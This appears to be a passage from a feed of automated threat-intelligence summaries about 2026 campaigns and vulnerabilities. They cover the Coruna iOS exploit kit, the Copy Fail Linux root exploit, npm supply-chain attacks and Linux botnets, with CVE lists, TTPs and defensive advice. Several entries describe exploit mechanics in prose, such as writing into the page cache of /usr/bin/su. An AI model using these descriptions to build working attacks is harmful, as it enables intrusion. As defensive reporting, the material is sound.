#threatreport #MediumCompleteness Coruna iOS Exploit Kit: Observed Traffic Across Education and Government Sectors | 16-03-2026 Source: centripetal.ai/threat-resear… Key details below ↓ 🧑‍💻Actors/Campaigns: Unc6353 (🧠motivation: cyber_espionage, financially_motivated) Unc6691 (🧠motivation: cyber_espionage, financially_motivated) Triangulation Lazarus 💀Threats: Coruna_tool, Watering_hole_technique, Plasmagrid, Corepayload, Eternalblue_vuln, Wannacry, Eternal_petya, 🎯Victims: Education, Government, Finance, Cryptocurrency, Ukraine 🏭Industry: Government, Financial, Education 🌐Geo: Australian, Russian, Iran, China, Chinese, Ukrainian 🔓CVEs: CVE-2022-48503 \[[Vulners](vulners.com/cve/CVE-2022-485…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - apple safari (<15.6) - apple ipados (<15.6) - apple iphone_os (<15.6) - apple macos (<12.5) ... CVE-2023-38606 \[[Vulners](vulners.com/cve/CVE-2023-386…)] - CVSS V3.1: *5.5*, - Vulners: Exploitation: True Soft: - apple ipados (<15.7.8, <16.6) - apple iphone_os (<15.7.8, <16.6) - apple macos (<11.7.9, <12.6.8, <13.5) - apple tvos (<16.6) ... CVE-2024-23222 \[[Vulners](vulners.com/cve/CVE-2024-232…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - apple safari (<17.3) - apple ipados (<15.8.7, <16.7.5, <17.3) - apple iphone_os (<15.8.7, <16.7.5, <17.3) - apple macos (<12.7.3, <13.6.4, <14.3) ... CVE-2023-32409 \[[Vulners](vulners.com/cve/CVE-2023-324…)] - CVSS V3.1: *8.6*, - Vulners: Exploitation: True Soft: - apple safari (<16.5) - apple ipados (<15.7.8, <16.5) - apple iphone_os (<15.7.8, <16.5) - apple macos (<13.4) ... CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85) CVE-2023-32434 \[[Vulners](vulners.com/cve/CVE-2023-324…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - apple ipados (<15.7.7, <16.5.1) - apple iphone_os (<15.7.7, <16.5.1) - apple macos (<11.7.8, <12.6.7, <13.4.1) - apple watchos (<8.8.1, <9.5.2) ... CVE-2023-41974 \[[Vulners](vulners.com/cve/CVE-2023-419…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - apple ipados (<15.8.7, <17.0) - apple iphone_os (<15.8.7, <17.0) 🤖LLM extracted TTPs:` T1005, T1027, T1036, T1041, T1055, T1068, T1070.004, T1071.001, T1082, T1105, ... 🧨IOCs: - Domain: 6 💽Software: iMessage, WhatsApp, macOS 📲Wallets: metamask, tonkeeper 🪙Crypto: uniswap 🔢Algorithms: sha1, aes, lzw, chacha20 🔠Functions: PAC-authenticated 📜Programming Languages: javascript 💻Platforms: apple, intel #threatreport: The Coruna exploit kit, also referred to as CryptoWaters, has been identified as an advanced exploitation framework targeting iOS devices, specifically iPhone models operating on iOS versions ranging from 13.0 to 17.2.1. This kit encompasses a total of 23 individual exploits and is notable for its association with different threat actors, including commercial surveillance customers and two groups: UNC6353, linked to Russian espionage, and UNC6691, identified as a financially motivated Chinese actor. This framework marks a significant leap in the mass exploitation of iOS devices using sophisticated tools typically reserved for nation-state adversaries. The exploit kit's chain involves numerous vulnerabilities, such as CVE-2024-23222 for remote code execution, CVE-2023-41974—a kernel use-after-free vulnerability added to CISA's catalog, and several others exploited in earlier campaigns like Operation Triangulation. The exploit lifecycle begins when a user visits a malicious site, where they encounter an injected iframe that exploits WebKit vulnerabilities and subsequently escalates privilege through kernel vulnerabilities. The Coruna framework is capable of performing multiple validations and traverses through several stages, ensuring a comprehensive exploit architecture that eventually injects payloads into critical system processes. One of the main payloads associated with Coruna is PLASMAGRID, which utilizes the identifier com.apple.assistd. This payload acts as a stager that injects itself into the root-level iOS powerd daemon and establishes a command and control (C2) communication channel. Its capabilities include exfiltrating sensitive data such as images and notes, particularly focusing on cryptocurrency-related content, while also being capable of gathering additional personal data from compromised devices. Despite its capabilities, the malware lacks persistence, meaning it resides in RAM and requires user interaction (revisiting malicious websites) for reinfection. Research indicates that the Coruna kit uses advanced techniques to bypass iOS security measures, specifically Apple's Pointer Authentication Code. The kit features meticulous documentation and employs well-structured exploits, hinting at a level of sophistication consistent with professional development practices. The distribution strategy of UNC6691, targeting a wide array of cryptocurrency and financial websites for its infectious exploits, demonstrates a shift from targeted attacks to a broader, indiscriminate exploitation approach, maximizing the potential victim pool. Organizations are urged to take immediate action by ensuring that all devices are updated to the latest iOS version and implementing Lockdown Mode where updates cannot be applied. Traffic analysis from impacted environments highlights the urgent need for patch management and monitoring for specific indicators outlined in the exploit framework. With the rapidly evolving nature of this exploit, ongoing vigilance and adaptive network defense strategies are vital to mitigate potential threats posed by the Coruna exploit kit.

#DirtyDecrypt PoC Released for #Linux_Kernel CVE-2026-31635 #LPE #Vulnerability buff.ly/vaT0IAq

#threatreport #MediumCompleteness Observed PCPJack and infected npm packages, new attacks targeting peninsula, several vulnerabilities reported | 18-05-2026 Source: telsy.com/osservato-pcpjack-… Key details below ↓ 🧑‍💻Actors/Campaigns: Teampcp Mini_shai-hulud 💀Threats: Pcpjack_tool, Supply_chain_technique, Trickmo, Smishing_technique, Nightmare_eclipse_tool, Yellowkey_vuln, Greenplasma_vuln, 🎯Victims: Cloud infrastructure, Software supply chain, Software development, Banking, Financial technology, Digital wallets, Authentication services, Jewelry 🏭Industry: Financial, Transport 🌐Geo: Italia, France, Middle east, Austria, Italy 🔓CVEs: CVE-2026-6973 \[[Vulners](vulners.com/cve/CVE-2026-697…)] - CVSS V3.1: *7.2*, - Vulners: Exploitation: True Soft: - ivanti endpoint_manager_mobile (<12.6.1.1, 12.7.0.0, 12.8.0.0) CVE-2026-34486 \[[Vulners](vulners.com/cve/CVE-2026-344…)] - CVSS V3.1: *7.5*, - Vulners: Exploitation: Unknown Soft: - apache tomcat (9.0.116, 10.1.53, 11.0.20) CVE-2026-23918 \[[Vulners](vulners.com/cve/CVE-2026-239…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown Soft: - apache http_server (2.4.66) CVE-2026-42231 \[[Vulners](vulners.com/cve/CVE-2026-422…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: Unknown Soft: - n8n (<1.123.32, <2.17.4, 2.18.0) CVE-2026-42945 \[[Vulners](vulners.com/cve/CVE-2026-429…)] - CVSS V3.1: *8.1*, - Vulners: Exploitation: True CVE-2026-43284 \[[Vulners](vulners.com/cve/CVE-2026-432…)] - CVSS V3.1: *8.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.255, <5.15.205, <6.1.171, <6.6.138, <6.12.87) 🤖LLM extracted TTPs:` T1056.001, T1056.002, T1070.004, T1111, T1113, T1190, T1195.001, T1195.002, T1486, T1518, ... 💽Software: Linux, TanStack, Jenkins, Android, WhatsApp, Ivanti, NGINX, Apache Tomcat 🪙Crypto: bitcoin 🔢Algorithms: zip #threatreport: Recent cyber threat activity has centered around credential theft campaigns, newly discovered vulnerabilities, and incidents targeting various sectors. One notable development is the emergence of the PCPJack worm, which specifically targets credential theft from Linux cloud infrastructures. Unlike traditional cloud worms that often engage in cryptomining, PCPJack’s focus is on financial fraud, spam, extortion, or the resale of stolen credentials. This attack mode aligns with a broader trend of supply chain attacks, evidenced by the compromise of the jdownloader.org site, where attackers redirected legitimate software installer links to malicious files without accessing the server's file system. Further notable incidents include a series of malicious activities against the npm registry linked to the TeamPCP group. In May 2026, researchers observed the release of 84 malicious package versions, including a compromised version of the widely used @tanstack/react-router, which could have affected millions of developers. This was part of the Mini Shai-Hulud campaign, highlighting persistent risks associated with software supply chains. Additionally, Checkmarx experienced a similar attack that targeted their AST Scanner plugin for Jenkins, crucial for security analysis in CI/CD pipelines, putting numerous development environments at risk. In Italy, there has been an uptick in cybercrime targeting financial applications, particularly through the deployment of a new variant of the TrickMo banking trojan. This variant, also referred to as TrickMo C, employs credential phishing tactics via fullscreen overlays, keylogging, and notification suppression to capture sensitive user data. Concurrently, fourteen smishing campaigns using the INPS name have been documented, aimed at collecting credit card information for unauthorized transactions, marking a shift toward financial rather than identity theft. A separate phishing scheme exploiting highway toll payments further indicates a deliberate strategy to gather payment card data. Vulnerability disclosures have also been significant. A critical exploit for the Dirty Frag vulnerability in the Linux kernel (CVE-2026-43284) has emerged, which can be exploited with a high success rate and does not require critical timing conditions. More concerning is the long-standing vulnerability in F5's NGINX web server (CVE-2026-42945), a heap-based buffer overflow that poses serious risks including denial-of-service and possibly remote code execution. Additional vulnerabilities have been disclosed affecting Apache servers and the n8n platform, with public proof-of-concept exploits available. Furthermore, Ivanti has addressed multiple weaknesses, including a zero-day issue (CVE-2026-6973) exploited in the wild. Lastly, two unpatched zero-day vulnerabilities in Microsoft Windows, termed YellowKey and GreenPlasma, have been disclosed, prompting the need for heightened security measures while awaiting official patches. Organizations are advised to enhance their security postures accordingly.

#threatreport #MediumCompleteness How Dirty Frag rose from the Copy Fail exploit | 12-05-2026 Source: reversinglabs.com/blog/dirty… Key details below ↓ 💀Threats: Copyfail_vuln, Multiverze, Dirtyfrag_vuln, Dirty_pipe_vuln, Supply_chain_technique, 🎯Victims: Linux systems, Software supply chain, Developer environments, Open source package ecosystem 🔓CVEs: CVE-2022-0847 \[[Vulners](vulners.com/cve/CVE-2022-084…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.102, <5.15.25, <5.16.11) CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85) 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 4 🧨IOCs: - Hash: 24 - File: 1 💽Software: Linux, Twitter, Ubuntu, Unix, Debian 🔢Algorithms: sha256, zip 🔠Functions: b0, Shellcode 📜Programming Languages: python YARA: Found #threatreport: ReversingLabs (RL) has highlighted the exploitation of the CVE-2026-31431 vulnerability, also known as Dirty Frag or Copy Fail, which is a local privilege escalation vulnerability in the Linux kernel. This vulnerability, which gained significant attention after a broken embargo in May 2026, allowed attackers to exploit the kernel's page cache in a manner reminiscent of the Dirty Pipe vulnerabilities (CVE-2022-0847). Following the documentation of this flaw, RL identified 163 distinctive malicious samples linked to it, indicating a substantial preemptive exploitation phase at least nine days prior to public notification and fix deployment by Ubuntu. The analyzed samples include both traditional ELF binaries and Python-based scripts, encompassing a range of malicious formats under the exploit tags associated with CVE-2026-31431 and the separate categorization for samples derived from the V4bel/dirtyfrag reference found on GitHub. Specifically, 148 samples are tracked under the exploit tag for CVE-2026-31431, with recognizable names including Linux.Exploit.CVE-2026-31431, while 15 samples from the V4bel implementation are tagged under Linux.Exploit.DirtyFrag. The research details a surge in malicious samples beginning on May 1, 2026, underscoring a growing interest in exploiting this vulnerability. The detection of malicious behavior is facilitated by YARA rules developed by RL, aimed at identifying the specific shellcode patterns linked to the V4bel reference implementation. These patterns utilize standard techniques for executing a shell via syscall 59, executed without null byte insertion, which is commonly employed in position-independent shellcode development. However, it is important to note that while these YARA rules effectively correlate with ELF binaries, they do not cover Python-script and PyPI-wheel variants, which require alternative detection methodologies. RL's findings suggest significant operational value for defenders, as their developed YARA rules can be implemented in existing security infrastructures for real-time threat detection. With numerous samples classified as malicious even before widely accepted antivirus signatures captured the exploit, the potential for unmitigated risks within Linux environments remains high. The analytical tools offered by RL, such as Spectra Analyze, can enable continuous scanning efforts on newly submitted ELF files, ensuring rapid adaptation to emerging threats.

#Linux_Kernel #Dirty_Frag #LPE #Exploit Enables #Root_Access Across Major Distributions ift.tt/TdPjc9u

#threatreport #MediumCompleteness 'Copy Fail' Flaw: 5 YARA Rules for Detection | 02-05-2026 Source: reversinglabs.com/blog/copy-… Key details below ↓ 💀Threats: Copyfail_vuln, 🎯Victims: Server infrastructure, Cloud computing, Enterprise workloads, Multi tenant servers, Ci/cd pipelines, Container clusters 🔓CVEs: CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85) 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1027.002, T1027.008, T1027.009, T1059.004, T1059.006, T1068, T1105, T1548.001, T1611, ... 🧨IOCs: - File: 2 - Hash: 21 💽Software: Linux, Twitter, Ubuntu, Kubernetes, curl, PyInstaller 🔢Algorithms: aes, sha256, sha1, hmac, cbc 🔠Functions: splice, sendmsg 🗂️Win API: PIE 📜Programming Languages: javascript, python 💻Platforms: riscv64, amd64, arm YARA: Found #threatreport: The Copy Fail vulnerability, assigned CVE-2026-31431, is a critical local privilege escalation flaw found in the Linux kernel and was disclosed by Theori on April 29, 2026. It affects all major Linux distributions released since 2017 and allows any user with a local account to gain full administrative control without the need for passwords or any special tools. The exploit is a minimal 732-byte Python script that can be reliably executed on any affected system. The underlying mechanism of Copy Fail is a logic bug involving the kernel's support for cryptographic templates, specifically reachable through the AF_ALG socket interface. By manipulating this interface, an attacker can perform a controlled write operation that can affect essential files, including setuid binaries like /usr/bin/su. This exploit is exceptionally dangerous in environments where multiple users or workloads share the same kernel, such as multi-tenant servers and container clusters. The scope of the vulnerability encompasses Linux kernel versions 4.14 through 7.0-rc. Although patches are available, they had not been deployed across all distributions at the time of the disclosure. The ease of exploitation means that systems remain exposed until they are updated. The attack can escalate quickly if an attacker already has access to the Linux environment. ReversingLabs reported that they had identified several instances of the vulnerable exploit shortly after its public disclosure, including four distinct Python samples derived from the original proof of concept. These samples were variations of the initial script, exhibiting changes such as altered line endings or minor whitespace adjustments that did not influence their functionality. This variation indicates the limitations of hash-based detection methods, as the same underlying code can yield different hashes with trivial modifications. In response, ReversingLabs developed targeted YARA rules to combat the Copy Fail threat. These ranged from high-confidence rules that detect exact matches of the original proof of concept to broader rules aimed at identifying variants and compiled ELF binaries associated with the same exploit. One notable derived work is a C implementation called goodcopy.c, which allows for targeting different architectures and includes enhanced cleanup measures to reset the page cache post-exploitation, thereby preventing follow-up attacks.

#threatreport #LowCompleteness Copy Fail: 732 Bytes to Root on Every Major Linux Distribution. | 30-04-2026 Source: xint.io/blog/copy-fail-linux… Key details below ↓ 💀Threats: Copyfail_vuln, Dirty_cow_vuln, Dirty_pipe_vuln, 🎯Victims: Linux distributions, Kubernetes platforms, Cloud computing 🔓CVEs: CVE-2016-5195 \[[Vulners](vulners.com/cve/CVE-2016-519…)] - CVSS V3.1: *7.0*, - Vulners: Exploitation: True Soft: - canonical ubuntu_linux (12.04, 14.04, 16.04, 16.10) CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85) CVE-2022-0847 \[[Vulners](vulners.com/cve/CVE-2022-084…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.102, <5.15.25, <5.16.11) 📚TTPs: ⚔️Tactics: 2 🛠️Technics: 0 🤖LLM extracted TTPs:` T1059.006, T1068, T1548.001, T1611 🧨IOCs: - File: 5 💽Software: Linux, Ubuntu, Kubernetes, Android 🔢Algorithms: aes, hmac, sha256, cbc 🔠Functions: splice, read, mmap, execve, recvmsg, sg_chain, crypto_authenc_esn_decrypt, crypto_authenc_esn_decrypt_tail, sendmsg, recv, ... 📜Programming Languages: python #threatreport: CVE-2026-31431, identified as "Copy Fail," is a critical logic vulnerability in the Linux kernel’s authentication encryption template, which enables an unprivileged local user to perform a controlled 4-byte write into the page cache of any readable file. This vulnerability was disclosed by Xint Code and is applicable across all major Linux distributions, including Ubuntu, Amazon Linux, RHEL, and SUSE. The exploit can be executed with a simple 732-byte Python script, leveraging functionalities from standard library modules, making it particularly notable for its simplicity and portability. The root of "Copy Fail" lies within the Linux kernel’s handling of cryptographic operations combined with page cache management. Specifically, the exploit manipulates the AF_ALG interface, widely used for cryptography, to execute a deterministic write that alters the page cache without racing conditions or erroneous timing windows. This straightforward approach distinguishes it from previous privilege escalation vulnerabilities like "Dirty Cow" and "Dirty Pipe," which involved more complex conditions and specific version dependencies. The mechanism of exploitation involves a targeted write into the page cache of a setuid binary, specifically /usr/bin/su, which is present in the major distributions since 2017. The attack operates by constructing a payload that is sent in chunks through sendmsg() and splice(), where particular parameters are carefully chosen to ensure the payload is inserted into the system's binaries. Once the payload is injected, executing the modified binary grants root access. Additionally, the implications of this vulnerability extend beyond mere local privilege escalation; the shared nature of the page cache allows for a potential container escape, impacting Kubernetes environments substantially. Therefore, Copy Fail poses a significant risk, especially in multi-tenant cloud infrastructures where a compromised container could lead to broader system access. The vulnerability was reported to the Linux kernel security team in March 2026 and swiftly acknowledged, with patches proposed and committed to the mainline kernel shortly thereafter, demonstrating a proactive response to mitigating the risk. Public disclosure occurred on April 29, 2026, following the establishment of an effective remediation timeline.

#threatreport #LowCompleteness Copy Fail: Universal Linux Local Privilege Escalation Vulnerability | 01-05-2026 Source: wiz.io/blog/copyfail-cve-202… Key details below ↓ 💀Threats: Copyfail_vuln, 🎯Victims: Linux systems 🔓CVEs: CVE-2026-31431 \[[Vulners](vulners.com/cve/CVE-2026-314…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: True Soft: - linux linux_kernel (<5.10.254, <5.15.204, <6.1.170, <6.6.137, <6.12.85) 🤖LLM extracted TTPs:` T1068, T1105, T1548.001 🧨IOCs: - File: 2 - Hash: 1 💽Software: Linux, Ubuntu, Debian, Fedora, curl 🔠Functions: splice 💻Platforms: intel #threatreport: The Copy Fail vulnerability, identified as CVE-2026-31431, poses a significant threat to Linux systems by allowing local unprivileged users to escalate their privileges to root. This vulnerability, discovered by Xint, applies to nearly all versions of the Linux kernel released since 2017, potentially risking millions of installations. As of May 1, 2026, the patch for this vulnerability has been integrated into the upstream Linux kernel, but numerous distributions have yet to implement these fixes. Copy Fail arises from a logic flaw within the Linux kernel's AEAD crypto implementation. Specifically, the error is associated with how scatter-gather lists are processed. This mismanagement enables attackers to overwrite four bytes in the page cache of any readable file on the system, including critical executables such as setuid binaries. By combining this flaw with AF_ALG sockets and the splice() system call, an attacker can leverage this to gain elevated privileges effectively. Linux distributions are responding at varying rates. For example, Debian's sid (unstable) branch has been patched, while stable releases remain vulnerable without confirmed backport fixes. Other distributions, such as Ubuntu and CloudLinux, have not issued patches as of the specified date, whereas Fedora, RHEL, and others are in the process of rolling out fixes. Arch Linux, following a rolling release model, appears to have implemented the necessary patches promptly. Monitoring systems for signs of exploitation is crucial. One indicator is the logging of the message "NET: Registered PF_ALG protocol family" in kern.log and syslog, which is standard during boot and legitimate application operations but may require further investigation when associated with other suspicious activities. Additionally, interactions with Xint's website, which hosts Proof of Concept (PoC) exploit code for the vulnerability, should be logged, particularly curl commands querying the site at copy.fail/exp. Internal testing has shown that executing a page-cache-modified version of /usr/bin/su can introduce anomalies in authentication logs, leading to entries that lack the caller's identity. This absence suggests that the exploitation attempt could corrupt the binary's runtime state, further complicating forensic analysis post-compromise. It is essential for organizations relying on Linux systems to prioritize the mitigation of this vulnerability by applying the latest patches and monitoring for related anomalous activities.

#Zero_Day #vulnerabilities #Flaw in #Linux_Kernel Found by #AI-Equipped #Security Researcher buff.ly/AR3qnkp

the @Linux_Kernel according to GPT-5.5

#threatreport #MediumCompleteness Dead Souls in Infrastructure - Shedding Zmiy's attack on healthcare | 09-04-2026 Source: rt-solar.ru/solar-4rays/blog… Key details below ↓ 🧑‍💻Actors/Campaigns: Shedding_zmiy (🧠motivation: cyber_espionage) 💀Threats: Gsocket_tool, Gs-netcat, Bincryptor_tool, Bulldog_backdoor, Megatsune, Kitsune, Revsocks_tool, Nmap_tool, Mycelium, Leech, Cloudflared_tool, Birdwatch_loader, Garble_tool, Dc_stealer, Bincrypter_tool, 🎯Victims: Healthcare 🏭Industry: Healthcare 🔓CVEs: CVE-2023-6546 \[[Vulners](vulners.com/cve/CVE-2023-654…)] - CVSS V3.1: *7.0*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<6.5) 📚TTPs: ⚔️Tactics: 1 🛠️Technics: 0 🤖LLM extracted TTPs:` T1014, T1027.002, T1041, T1046, T1053.003, T1057, T1068, T1070, T1078, T1083, ... 🧨IOCs: - File: 2 - Hash: 18 - Domain: 6 - IP: 1 💽Software: Telegram, VKontakte, PostgreSQL, Linux, macOS, Unix, Firefox, Chromium, Active Directory 🔢Algorithms: sha256, sha1, md5 🔠Functions: to 📜Programming Languages: rust 💻Platforms: apple #threatreport: In a recent incident involving the Shedding Zmiy group targeting healthcare infrastructure, attackers maintained access to the network for over six months, utilizing compromised accounts of terminated employees who had not been promptly deactivated. This oversight allowed the threat actors to engage in espionage and conduct various malicious activities. The attackers gained initial access through VPN connections, exploiting a poorly secured PostgreSQL server, allowing for remote command execution using the database's legitimate functions. The attackers deployed malicious utilities, such as gs-netcat, anchoring it within PostgreSQL’s files, which facilitated lateral movement across the network. They utilized various obfuscation techniques, including packing their malware with Bincryptor and UPX. The Bulldog Backdoor, a known tool of the Shedding Zmiy group, was identified, alongside the Megatsune Rootkit, which is capable of collecting passwords and SSH keys essential for further system access. Moreover, the attacks involved the use of utilities like Nmap for infrastructure scanning, along with privilege escalation and log removal tools to evade detection. The incident highlighted a significant challenge regarding the retrospective analysis of VPN logs, which were insufficient for tracing back six months due to their limited depth. This lack of data rendered the investigation complex, particularly as many suspicious IP addresses belonged to employees who had already been terminated, complicating the attribution of the attacks further. Initial signs of compromise suggest the potential use of phishing to gain access to employee systems. In the evolving landscape of attacks, new versions of Shedding Zmiy's tools and methods were identified. The group had updated their malware to include enhanced functionality such as browser credential stealing and taking screenshots, raising concerns regarding possible attacks on macOS environments as well. A sophisticated Rust-based backdoor was also discovered, indicating the group’s development and adaptation to new technologies. To mitigate such threats, cybersecurity recommendations emphasize the necessity of maintaining an up-to-date inventory of user accounts, deactivating those of terminated employees, and instituting second factor authentication for VPN access. Organizations are encouraged to enhance their VPN logging capabilities, integrating these logs with Security Information and Event Management (SIEM) systems for better detection and response to compromise incidents.

Under the hood of Linux 7.1 🧠💻. The latest kernel updates are all about efficiency and stability. Read more: 👉 tinyurl.com/55hjxh3j #Linux_Kernel #Kernel_Linux

#threatreport #MediumCompleteness Old-School IRC, New Victims: Inside the Newly Discovered SSHStalker Linux Botnet | 09-02-2026 Source: flare.io/learn/resources/blo… Key details below ↓ 💀Threats: Sshstalker, Tsunami_framework, Keiten, Nmap_tool, Logcleaner_tool, Outlaw_botnet, Phoenixminer, Prochider, Ircbot, 🎯Victims: Cloud hosting providers, Linux servers, Oracle cloud infrastructure 🏭Industry: Financial 🌐Geo: Russian, Chinese, German, Asia, French, Apac, Romanian 🔓CVEs: CVE-2009-2692 \[[Vulners](vulners.com/cve/CVE-2009-269…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.4.37.5, <2.6.30.5) CVE-2009-2267 \[[Vulners](vulners.com/cve/CVE-2009-226…)] - CVSS V3.1: *6.9*, - Vulners: Exploitation: Unknown Soft: - vmware ace (2.5.0, 2.5.1, 2.5.2) - vmware esx (2.5.5, 3.0.3, 3.5, 4.0) - vmware esxi (3.5, 4.0) - vmware fusion (2.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4) ... CVE-2009-2698 \[[Vulners](vulners.com/cve/CVE-2009-269…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.19) CVE-2009-2908 \[[Vulners](vulners.com/cve/CVE-2009-290…)] - CVSS V3.1: *4.9*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (2.6.31) CVE-2010-2959 \[[Vulners](vulners.com/cve/CVE-2010-295…)] - CVSS V3.1: *7.2*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.27.53, <2.6.32.21, <2.6.34.6, <2.6.35.4) CVE-2010-3849 \[[Vulners](vulners.com/cve/CVE-2010-384…)] - CVSS V3.1: *4.7*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.36.2) CVE-2010-1173 \[[Vulners](vulners.com/cve/CVE-2010-117…)] - CVSS V3.1: *7.1*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (le2.6.33.3, 2.6.0, 2.6.1, 2.6.2, 2.6.3) CVE-2009-3547 \[[Vulners](vulners.com/cve/CVE-2009-354…)] - CVSS V3.1: *7.0*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (le2.6.31.14, 2.6.32) CVE-2010-3437 \[[Vulners](vulners.com/cve/CVE-2010-343…)] - CVSS V3.1: *6.6*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<2.6.36) 📚TTPs: ⚔️Tactics: 3 🛠️Technics: 0 🤖LLM extracted TTPs:` T1027, T1036, T1036.005, T1046, T1053.003, T1059, T1059.004, T1068, T1070.002, T1078, ... 🧨IOCs: - IP: 8 - Coin: 2 - Hash: 23 💽Software: Linux, Ubuntu 🪙Crypto: ethereum 🔢Algorithms: zip, md5 📜Programming Languages: python, perl, golang 💻Platforms: cross-platform, arm, x86, x64 #threatreport: The SSHStalker botnet represents a resurgence of traditional Internet Relay Chat (IRC) mechanisms, using multiple bot variants and leveraging older Linux exploitation techniques. This botnet employs a command-and-control (C2) infrastructure that emphasizes redundancy and cost-effectiveness, facilitating mass SSH compromises. The operational methodology consists of an automated pipeline that integrates SSH scanning mechanisms that resemble the functionality of "nmap," ultimately connecting compromised systems to IRC channels for command execution. Upon successful intrusion, SSHStalker deploys two C-based bot variants that differ minimally, targeting a range of hardware architectures including ARM and x86. These bots facilitate communication with designated IRC servers to receive commands. The botnet's persistence framework relies on cron jobs that execute every minute, allowing it to resurface quickly even after attempts to disable it. The underlying toolkit features both rootkit capabilities and log-cleaning functions, aimed at maintaining stealth and covering its tracks, while utilizing a collection of legacy Linux kernel exploits from around 2009-2010 that remain effective against outdated systems. The botnet's architecture is notable for its similarities to existing Romanian-linked botnet operations—design, execution logic, and IRC enlisting strategies echo those seen in past campaigns—but it lacks definitive attribution to any specific threat actor. Intrusion analysis indicates the threat actor's operations center around exploiting vulnerabilities within legacy Linux distributions, enriched with a variety of tools designed for privilege escalation and continuous access. The SSHStalker’s ecosystem further extends to illicit cryptocurrency mining activities, suggesting a financial incentive behind its deployment. Scanning operations have already uncovered approximately 7,000 compromised SSH targets, primarily within cloud infrastructures. Additionally, tools aimed at harvesting sensitive information from misconfigured web applications reinforce its operational scale and effectiveness. With regard to detection and mitigation, it is crucial for network defenders to remain vigilant. Suggested strategies include monitoring for unusual executions of compilation tools, alerting on rapid execution of newly compiled binaries, scrutinizing cron job activities, and observing TCP connection patterns that exhibit unusual persistence. Regular audits on user account modifications, especially concerning privileged users and SSH keys, alongside monitoring for atypical accesses to system log files, can fortify defenses against potential intrusions linked to this evolving threat landscape.

The economics of #AI-assisted development just changed dramatically. Chris Mason's new task-based review framework demonstrates that intelligent prompt architecture matters as much as model selection. Read more: 👉 tinyurl.com/4dn44zvx #Linux_Kernel

#threatreport #HighCompleteness ShadowHS: A Fileless Linux PostExploitation Framework Built on a Weaponized hackshell | 30-01-2026 Source: cyble.com/blog/shadowhs-file… Key details below ↓ 💀Threats: Shadowhs_tool, Hackshell_tool, Credential_harvesting_technique, Rondodox, Kinsing_miner, Xmrig_miner, Ebury, Credential_stealing_technique, Gminer, Lolminer, Gsocket_tool, Gs-netcat, Rustscan_tool, Dirty_pipe_vuln, 🎯Victims: Enterprise environments, Cloud hosted linux environments 🏭Industry: Ics 🔓CVEs: CVE-2025-21756 \[[Vulners](vulners.com/cve/CVE-2025-217…)] - CVSS V3.1: *7.8*, - Vulners: Exploitation: Unknown Soft: - linux linux_kernel (<5.10.235, <5.15.179, <6.1.131, <6.6.79, <6.12.16) 📚TTPs: ⚔️Tactics: 9 🛠️Technics: 1 🧨IOCs: - Coin: 3 - IP: 5 - Domain: 3 - File: 1 - Hash: 26 💽Software: Linux, OpenSSL, Microsoft Defender, OpenSSH, AppArmor, Bitrix, WordPress, Docker, rsync 🔢Algorithms: exhibit, aes-256-cbc, base64, sha256, gzip, kawpow 🔠Functions: _once, gpu, rs, rs1 🗂️Win API: decompress 📜Programming Languages: perl, golang #threatreport: Cyble Research & Intelligence Labs has uncovered a sophisticated Linux intrusion framework known as ShadowHS, which leverages a fileless loader and a weaponized variant of hackshell for post-exploitation activities. This framework is notable for its emphasis on stealth and operator-controlled interactions, distinguishing it from conventional Linux malware that focuses on rapid propagation or monetization. ShadowHS executes entirely from memory, utilizing techniques such as anonymous file descriptors, argv 0 spoofing, and the avoidance of persistent file artifacts, making detection and forensic analysis significantly more challenging. The primary component of the framework is a multi-stage, encrypted shell loader that facilitates payload decryption, reconstruction, and execution without writing files to the disk. Once deployed, the payload operates in memory and is capable of downloading additional malicious components like kernel exploits or cryptominers when required. This operational design focuses heavily on environmental awareness and security control discovery, ensuring that adversaries can maintain a low profile within enterprise environments. Internally, the framework features dormant functionalities that can be activated, including credential access, lateral movement, and resource hijacking, providing flexibility based on the operator's objectives. The stealth capabilities are bolstered by mechanisms that disable shell histories, obscure command artifacts, and relocate temporary files, thus minimizing the traces left on compromised systems. Furthermore, the payload is built to detect and evade endpoint detection and antivirus solutions, enabling operators to continue utilizing the compromised infrastructure without interference. In essence, the operator-centric nature of ShadowHS, along with its sophisticated evasion tactics and ability to perform reconnaissance, 